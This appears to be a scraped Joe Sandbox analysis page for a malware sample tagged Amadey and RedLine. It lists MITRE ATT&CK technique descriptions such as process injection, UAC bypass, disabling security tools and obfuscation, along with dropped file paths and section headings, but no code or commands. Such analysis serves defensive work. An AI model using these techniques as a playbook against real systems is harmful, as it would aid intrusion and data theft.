Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report plEnknXWQD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\mx8896IL.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ns5251Ks.exe.log

C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe

C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe

C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe

C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe

C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe

Static File Info

General

Windows Analysis Report
plEnknXWQD.exe

Function 0038202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Function 00383BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Function 00381AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Function 0038597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Function 00384FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Function 00382F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Function 00385467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Function 00382390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Function 00382BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Function 00386F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre